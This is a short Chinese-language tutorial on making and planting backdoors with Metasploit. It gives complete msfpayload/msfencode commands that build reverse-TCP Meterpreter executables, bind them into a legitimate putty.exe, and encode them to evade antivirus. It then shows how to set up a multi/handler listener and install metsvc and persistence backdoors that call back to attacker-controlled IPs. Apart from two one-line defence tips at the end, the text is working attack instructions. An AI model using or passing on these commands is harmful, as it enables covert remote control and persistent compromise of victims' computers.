后门
后门,本意是指一座建筑背面开设的门,通常比较隐蔽,为进出建筑的人提供方便和隐蔽。在信息安全领域,后门是指绕过安全控制而获取对程序或系统访问权的方法。后门的最主要目的就是方便以后再次秘密进入或者控制系统。
在我们获取了控制会话之后
几个payload的制作工具
msfpayload
创建exe后门
show payloads
创建文件
./msfpayload windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.105 X> /root/Desktop/virus.exe
语法:
msfpayload 载荷的名称-LHOST-本地IP地址- X> 创建文件的位置
绑定到其他exe文件
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.20.111 R | msfencode -e x86/shikata_ga_nai -c 6 -t exe -x/root/Desktop/putty.exe -o /root/Desktop/virusputty.exe
语法解释
msfpayload -载荷名称-LHOST-本地IP地址-R | msfencode -编码器名称 -c 编码次数-指定一个可执行文件-输出文件位置
创建免杀后门
show encoders
选择优秀的编码器
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.20.144 R | msfencode -e x86/shikata_ga_nai -c 1 -t exe -x/root/Desktop/putty.exe -o /root/Desktop/superputty.exe
借助脚本创建(推荐)
接收反向会话
模块在 exploit /multi /handler
use exploit/multi/handler
设置payload
set payload windows/meterpreter/reverse_tcp
设置主机IP地址
开始监听
在会话中,我们可以安装一个叫做metsvc的后门程序
metsvc后门脚本
启动后门程序
run metsvc -A
删除后门程序
run metsvc -r
metasploit持久性后门
脚本为persistent
run persistence -h
run persistence -A -L C:\\-S -X -p 445 -i 10 -r 192.168.20.133
脚本为netcat
防御措施
1、安装杀毒软件
2、设置一定的安全基线检查机制